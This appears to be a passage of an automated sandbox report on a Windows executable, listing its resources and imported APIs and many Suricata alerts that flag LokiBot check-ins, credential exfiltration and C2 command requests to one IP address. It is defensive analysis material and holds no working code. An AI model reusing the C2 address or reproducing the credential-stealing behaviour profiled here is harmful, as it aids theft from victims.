RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x1ab34	data			1.0003748948465674
RT_GROUP_ICON	0xea2ec	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0xea364	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xea378	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xea38c	0x14	data	English	Great Britain	1.25
RT_VERSION	0xea3a0	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0xea47c	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Version Infos

Description	Data
Translation	0x0809 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-02-25T15:37:03.839421+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49704	104.21.80.1	80	TCP
2025-02-25T15:37:03.839421+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49704	104.21.80.1	80	TCP
2025-02-25T15:37:03.839421+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49704	104.21.80.1	80	TCP
2025-02-25T15:37:04.607899+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.5	49704	104.21.80.1	80	TCP
2025-02-25T15:37:05.884395+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49705	104.21.80.1	80	TCP
2025-02-25T15:37:05.884395+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49705	104.21.80.1	80	TCP
2025-02-25T15:37:05.884395+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49705	104.21.80.1	80	TCP
2025-02-25T15:37:06.604035+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.5	49705	104.21.80.1	80	TCP
2025-02-25T15:37:06.678043+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49706	104.21.80.1	80	TCP
2025-02-25T15:37:06.678043+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49706	104.21.80.1	80	TCP
2025-02-25T15:37:06.678043+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49706	104.21.80.1	80	TCP
2025-02-25T15:37:07.419216+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49706	104.21.80.1	80	TCP
2025-02-25T15:37:07.419216+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49706	104.21.80.1	80	TCP
2025-02-25T15:37:08.646573+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49707	104.21.80.1	80	TCP
2025-02-25T15:37:08.646573+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49707	104.21.80.1	80	TCP
2025-02-25T15:37:08.646573+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49707	104.21.80.1	80	TCP
2025-02-25T15:37:09.420736+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49707	104.21.80.1	80	TCP
2025-02-25T15:37:09.420736+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49707	104.21.80.1	80	TCP
2025-02-25T15:37:09.425648+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	49707	TCP
2025-02-25T15:37:10.582091+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49708	104.21.80.1	80	TCP
2025-02-25T15:37:10.582091+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49708	104.21.80.1	80	TCP
2025-02-25T15:37:10.582091+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49708	104.21.80.1	80	TCP
2025-02-25T15:37:11.352081+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49708	104.21.80.1	80	TCP
2025-02-25T15:37:11.352081+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49708	104.21.80.1	80	TCP
2025-02-25T15:37:11.357004+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	49708	TCP
2025-02-25T15:37:12.501734+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49709	104.21.80.1	80	TCP
2025-02-25T15:37:12.501734+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49709	104.21.80.1	80	TCP
2025-02-25T15:37:12.501734+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49709	104.21.80.1	80	TCP
2025-02-25T15:37:13.245782+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49709	104.21.80.1	80	TCP
2025-02-25T15:37:13.245782+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49709	104.21.80.1	80	TCP
2025-02-25T15:37:14.423788+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49710	104.21.80.1	80	TCP
2025-02-25T15:37:14.423788+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49710	104.21.80.1	80	TCP
2025-02-25T15:37:14.423788+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49710	104.21.80.1	80	TCP
2025-02-25T15:37:15.203334+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49710	104.21.80.1	80	TCP
2025-02-25T15:37:15.203334+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49710	104.21.80.1	80	TCP
2025-02-25T15:37:16.361092+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49711	104.21.80.1	80	TCP
2025-02-25T15:37:16.361092+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49711	104.21.80.1	80	TCP
2025-02-25T15:37:16.361092+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49711	104.21.80.1	80	TCP
2025-02-25T15:37:17.303127+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49711	104.21.80.1	80	TCP
2025-02-25T15:37:17.303127+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49711	104.21.80.1	80	TCP
2025-02-25T15:37:17.310199+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	49711	TCP
2025-02-25T15:37:18.470114+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49717	104.21.80.1	80	TCP
2025-02-25T15:37:18.470114+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49717	104.21.80.1	80	TCP
2025-02-25T15:37:18.470114+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49717	104.21.80.1	80	TCP
2025-02-25T15:37:19.261541+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49717	104.21.80.1	80	TCP
2025-02-25T15:37:19.261541+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49717	104.21.80.1	80	TCP
2025-02-25T15:37:20.449634+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49725	104.21.80.1	80	TCP
2025-02-25T15:37:20.449634+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49725	104.21.80.1	80	TCP
2025-02-25T15:37:20.449634+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49725	104.21.80.1	80	TCP
2025-02-25T15:37:21.219928+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49725	104.21.80.1	80	TCP
2025-02-25T15:37:21.219928+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49725	104.21.80.1	80	TCP
2025-02-25T15:37:21.224827+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	49725	TCP
2025-02-25T15:37:22.516317+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49741	104.21.80.1	80	TCP
2025-02-25T15:37:22.516317+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49741	104.21.80.1	80	TCP
2025-02-25T15:37:22.516317+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49741	104.21.80.1	80	TCP
2025-02-25T15:37:23.245148+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49741	104.21.80.1	80	TCP
2025-02-25T15:37:23.245148+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49741	104.21.80.1	80	TCP
2025-02-25T15:37:24.442832+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49752	104.21.80.1	80	TCP
2025-02-25T15:37:24.442832+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49752	104.21.80.1	80	TCP
2025-02-25T15:37:24.442832+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49752	104.21.80.1	80	TCP
2025-02-25T15:37:25.200397+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49752	104.21.80.1	80	TCP
2025-02-25T15:37:25.200397+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49752	104.21.80.1	80	TCP
2025-02-25T15:37:25.205421+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	49752	TCP
2025-02-25T15:37:26.362703+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49764	104.21.80.1	80	TCP
2025-02-25T15:37:26.362703+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49764	104.21.80.1	80	TCP
2025-02-25T15:37:26.362703+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49764	104.21.80.1	80	TCP
2025-02-25T15:37:27.145008+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49764	104.21.80.1	80	TCP
2025-02-25T15:37:27.145008+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49764	104.21.80.1	80	TCP
2025-02-25T15:37:27.149933+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	49764	TCP
2025-02-25T15:37:28.324980+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49779	104.21.80.1	80	TCP
2025-02-25T15:37:28.324980+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49779	104.21.80.1	80	TCP
2025-02-25T15:37:28.324980+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49779	104.21.80.1	80	TCP
2025-02-25T15:37:29.117371+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49779	104.21.80.1	80	TCP
2025-02-25T15:37:29.117371+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49779	104.21.80.1	80	TCP
2025-02-25T15:37:29.122307+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	49779	TCP
2025-02-25T15:37:30.282636+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49792	104.21.80.1	80	TCP
2025-02-25T15:37:30.282636+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49792	104.21.80.1	80	TCP
2025-02-25T15:37:30.282636+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49792	104.21.80.1	80	TCP
2025-02-25T15:37:31.069825+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49792	104.21.80.1	80	TCP
2025-02-25T15:37:31.069825+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49792	104.21.80.1	80	TCP
2025-02-25T15:37:32.262945+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49804	104.21.80.1	80	TCP
2025-02-25T15:37:32.262945+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49804	104.21.80.1	80	TCP
2025-02-25T15:37:32.262945+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49804	104.21.80.1	80	TCP
2025-02-25T15:37:32.994691+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49804	104.21.80.1	80	TCP
2025-02-25T15:37:32.994691+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49804	104.21.80.1	80	TCP
2025-02-25T15:37:34.171066+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49819	104.21.80.1	80	TCP
2025-02-25T15:37:34.171066+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49819	104.21.80.1	80	TCP
2025-02-25T15:37:34.171066+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49819	104.21.80.1	80	TCP
2025-02-25T15:37:34.936276+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49819	104.21.80.1	80	TCP
2025-02-25T15:37:34.936276+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49819	104.21.80.1	80	TCP
2025-02-25T15:37:36.096465+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49832	104.21.80.1	80	TCP
2025-02-25T15:37:36.096465+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49832	104.21.80.1	80	TCP
2025-02-25T15:37:36.096465+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49832	104.21.80.1	80	TCP
2025-02-25T15:37:36.860421+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49832	104.21.80.1	80	TCP
2025-02-25T15:37:36.860421+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49832	104.21.80.1	80	TCP
2025-02-25T15:37:36.866045+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	49832	TCP
2025-02-25T15:37:38.017545+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49846	104.21.80.1	80	TCP
2025-02-25T15:37:38.017545+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49846	104.21.80.1	80	TCP
2025-02-25T15:37:38.017545+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49846	104.21.80.1	80	TCP
2025-02-25T15:37:38.830471+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49846	104.21.80.1	80	TCP
2025-02-25T15:37:38.830471+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49846	104.21.80.1	80	TCP
2025-02-25T15:37:38.835368+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	49846	TCP
2025-02-25T15:37:39.994212+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49860	104.21.80.1	80	TCP
2025-02-25T15:37:39.994212+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49860	104.21.80.1	80	TCP
2025-02-25T15:37:39.994212+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49860	104.21.80.1	80	TCP
2025-02-25T15:37:40.743613+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49860	104.21.80.1	80	TCP
2025-02-25T15:37:40.743613+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49860	104.21.80.1	80	TCP
2025-02-25T15:37:41.899055+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49873	104.21.80.1	80	TCP
2025-02-25T15:37:41.899055+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49873	104.21.80.1	80	TCP
2025-02-25T15:37:41.899055+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49873	104.21.80.1	80	TCP
2025-02-25T15:37:42.675209+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49873	104.21.80.1	80	TCP
2025-02-25T15:37:42.675209+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49873	104.21.80.1	80	TCP
2025-02-25T15:37:42.683388+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	49873	TCP
2025-02-25T15:37:43.834928+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49886	104.21.80.1	80	TCP
2025-02-25T15:37:43.834928+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49886	104.21.80.1	80	TCP
2025-02-25T15:37:43.834928+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49886	104.21.80.1	80	TCP
2025-02-25T15:37:44.600916+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49886	104.21.80.1	80	TCP
